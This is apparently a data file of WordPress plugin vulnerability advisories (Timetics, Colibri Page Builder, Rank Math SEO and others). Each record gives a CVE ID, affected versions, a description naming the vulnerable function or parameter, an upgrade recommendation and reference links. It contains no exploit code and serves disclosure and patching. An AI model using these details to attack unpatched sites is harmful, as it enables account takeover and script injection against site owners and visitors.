{"CVE_ID":"CVE-2024-11275","slug":"timetics","versionImpact":"1.0.27","versionEndExcluding":"1.0.28","description":"The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the \/wp-json\/timetics\/v1\/customers\/ REST API endpoint in all versions up to, and including, 1.0.27. This makes it possible for authenticated attackers, with Timetics Customer access and above, to delete arbitrary users.","recommendation":"Update to version 1.0.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php#L308\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php#L308\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206505%40timetics&new=3206505%40timetics&sfp_email=&sfph_mail=#file199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206505%40timetics&new=3206505%40timetics&sfp_email=&sfph_mail=#file199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d68e250e-d850-4100-81db-3e3c48a3a4a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d68e250e-d850-4100-81db-3e3c48a3a4a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5038","slug":"colibri-page-builder","versionImpact":"1.0.276","versionEndExcluding":"1.0.277","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.276 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.277, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08159865-1411-4a07-b5db-f4ba5bf2d633?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08159865-1411-4a07-b5db-f4ba5bf2d633?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/blog\\\/post-item.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/blog\\\/post-item.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4451","slug":"colibri-page-builder","versionImpact":"1.0.276","versionEndExcluding":"1.0.277","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's colibri_video_player shortcode in all versions up to, and including, 1.0.276 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.277, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0afd981e-3ae8-4450-9750-23ff6fe612dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0afd981e-3ae8-4450-9750-23ff6fe612dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097694\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/video.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3340","slug":"colibri-page-builder","versionImpact":"1.0.272","versionEndExcluding":"1.0.274","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'colibri-gallery-slideshow' shortcode in all versions up to, and including, 1.0.272 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.274, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ba832e-98bc-421d-9b60-e6260c408815?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5ba832e-98bc-421d-9b60-e6260c408815?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3337","slug":"colibri-page-builder","versionImpact":"1.0.272","versionEndExcluding":"1.0.274","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'colibri_breadcrumb_element' shortcode in all versions up to, and including, 1.0.272 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.274, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ae4226-0089-47fb-87b9-94e9faf764e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ae4226-0089-47fb-87b9-94e9faf764e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/breadcrumb.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/breadcrumb.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2117","slug":"image-optimizer-wd","versionEndExcluding":"1.0.27","description":"The Image Optimizer by 10web WordPress plugin before 1.0.27 does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44024299-ba40-4da7-81e1-bd44d10846f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44024299-ba40-4da7-81e1-bd44d10846f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2122","slug":"image-optimizer-wd","versionEndExcluding":"1.0.27","description":"The Image Optimizer by 10web WordPress plugin before 1.0.27 does not sanitise and escape the iowd_tabs_active parameter before rendering it in the plugin admin panel, leading to a reflected Cross-Site Scripting vulnerability, allowing an attacker to trick a logged in admin to execute arbitrary javascript by clicking a link.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936fd93a-428d-4744-a4fc-c8da78dcbe78\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/936fd93a-428d-4744-a4fc-c8da78dcbe78\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3338","slug":"colibri-page-builder","versionImpact":"1.0.262","versionEndExcluding":"1.0.264","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt data parameter in all versions up to, and including, 1.0.262 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.264, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a066eae-4040-4d76-b730-47d98dc37662?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a066eae-4040-4d76-b730-47d98dc37662?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/extend-builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074785\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/extend-builder.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1870","slug":"colibri-page-builder","versionImpact":"1.0.260","versionEndExcluding":"1.0.263","description":"The Colibri Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callActivateLicenseEndpoint function in all versions up to, and including, 1.0.260. This makes it possible for authenticated attackers, with subscriber access or higher, to update the license key.","recommendation":"Update to version 1.0.263, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php#L356\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php#L356\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045582\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045582\\\/colibri-page-builder\\\/trunk\\\/src\\\/License\\\/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9263","slug":"timetics","versionImpact":"1.0.25","versionEndExcluding":"1.0.26","description":"The WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin plugin for WordPress is vulnerable to Account Takeover\/Privilege Escalation via Insecure Direct Object Reference in all versions up to, and including, 1.0.25 via the save() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to reset the emails and passwords of arbitrary user accounts, including administrators, which makes account takeover and privilege escalation possible.","recommendation":"Update to version 1.0.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74bd595b-d2fa-4c62-82d2-dba2c2b128f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74bd595b-d2fa-4c62-82d2-dba2c2b128f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/tags\\\/1.0.25\\\/core\\\/customers\\\/customer.php#L299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timetics\\\/tags\\\/1.0.25\\\/core\\\/customers\\\/customer.php#L299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/customer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/customer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169771\\\/timetics\\\/trunk\\\/core\\\/customers\\\/api-customer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12337","slug":"wc-planzer-shipping","versionImpact":"1.0.25","versionEndExcluding":"1.0.26","description":"The Shipping via Planzer for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018processed-ids\u2019 parameter in all versions up to, and including, 1.0.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214785\\\/wc-planzer-shipping\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214785\\\/wc-planzer-shipping\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e80ed130-8ad2-4fb0-a583-02fc675804d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e80ed130-8ad2-4fb0-a583-02fc675804d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6988","slug":"colibri-page-builder","versionImpact":"1.0.239","versionEndExcluding":"1.0.240","description":"The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's extend_builder_render_js shortcode in all versions up to, and including, 1.0.239 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.240, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/300b24af-10a1-45b9-87ec-7c98dc94e76b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/300b24af-10a1-45b9-87ec-7c98dc94e76b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/render-js.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/colibri-page-builder\\\/trunk\\\/extend-builder\\\/shortcodes\\\/render-js.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013337%40colibri-page-builder&new=3013337%40colibri-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3013337%40colibri-page-builder&new=3013337%40colibri-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2710","slug":"wp-responsive-video-gallery-with-lightbox","versionEndExcluding":"1.0.23","description":"The video carousel slider with lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.22\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.22\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.23\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.23\\\/wp-responsive-video-gallery-with-lightbox.php#L1023\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e88bb3a8-de24-46fb-a3e4-9ca3fdd4cca7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e88bb3a8-de24-46fb-a3e4-9ca3fdd4cca7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1716","slug":"admin-bar","versionImpact":"1.0.2.2","versionEndExcluding":"1.0.23","description":"The Admin Bar Remover plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_form() function in all versions up to, and including, 1.0.2.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to enable or disable the admin bar on the front-end of the site.","recommendation":"Update to version 1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbf2556-0509-4d8a-8949-494c6bc82ea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbf2556-0509-4d8a-8949-494c6bc82ea1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-bar\\\/trunk\\\/Inc\\\/Classes\\\/AdminBarRemover.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-bar\\\/trunk\\\/Inc\\\/Classes\\\/AdminBarRemover.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955636\\\/admin-bar\\\/trunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2955636\\\/admin-bar\\\/trunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12465","slug":"property-hive-stamp-duty-calculator","versionImpact":"1.0.22","versionEndExcluding":"1.0.23","description":"The Property Hive Stamp Duty Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stamp_duty_calculator_scotland' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207024%40property-hive-stamp-duty-calculator&new=3207024%40property-hive-stamp-duty-calculator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207024%40property-hive-stamp-duty-calculator&new=3207024%40property-hive-stamp-duty-calculator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0965","slug":"simple-page-access-restriction","versionImpact":"1.0.21","versionEndExcluding":"1.0.23","description":"The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content.","recommendation":"Update to version 1.0.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030099\\\/simple-page-access-restriction\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030099\\\/simple-page-access-restriction\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9314","slug":"seo-by-rank-math","versionImpact":"1.0.228","versionEndExcluding":"1.0.229","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.228 via deserialization of untrusted input 'set_redirections' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.0.229, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af5ed47e-f183-4e72-a916-15020e2bc91e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af5ed47e-f183-4e72-a916-15020e2bc91e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L507\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L507\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/admin\\\/class-import-export.php#L514\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9161","slug":"seo-by-rank-math","versionImpact":"1.0.228","versionEndExcluding":"1.0.229","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'update_metadata' function in all versions up to, and including, 1.0.228. This makes it possible for unauthenticated attackers to insert new and update existing metadata beginning with 'rank_math', and delete arbitrary existing user metadata and term metadata. Deleting existing usermeta can cause a loss of access to the administrator dashboard for any registered users, including Administrators.","recommendation":"Update to version 1.0.229, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df39a64-76c5-4ebe-a271-44bd147a3a86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df39a64-76c5-4ebe-a271-44bd147a3a86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161896\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1094","slug":"timetics","versionImpact":"1.0.21","versionEndExcluding":"1.0.22","description":"The Timetics- AI-powered Appointment Booking with Visual Seat Plan and ultimate Calendar Scheduling plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the make_staff() function in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to grant users staff permissions.","recommendation":"Update to version 1.0.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76fe8746-582e-49a5-b0c1-19d2aaef44df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76fe8746-582e-49a5-b0c1-19d2aaef44df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101489\\\/timetics\\\/trunk\\\/core\\\/staffs\\\/hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101489\\\/timetics\\\/trunk\\\/core\\\/staffs\\\/hooks.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8741","slug":"beam-me-up-scotty","versionImpact":"1.0.21","versionEndExcluding":"1.0.22","description":"The Beam me up Scotty \u2013 Back to Top Button plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3428bc71-64f9-4f8d-85c8-7dda81b2ac18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3428bc71-64f9-4f8d-85c8-7dda81b2ac18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beam-me-up-scotty\\\/tags\\\/1.0.21\\\/library\\\/template-parts\\\/tabs.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beam-me-up-scotty\\\/tags\\\/1.0.21\\\/library\\\/template-parts\\\/tabs.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156146\\\/beam-me-up-scotty\\\/trunk\\\/library\\\/template-parts\\\/tabs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156146\\\/beam-me-up-scotty\\\/trunk\\\/library\\\/template-parts\\\/tabs.php\",\"refsource\":\"\",\"tags\":[]}]"}
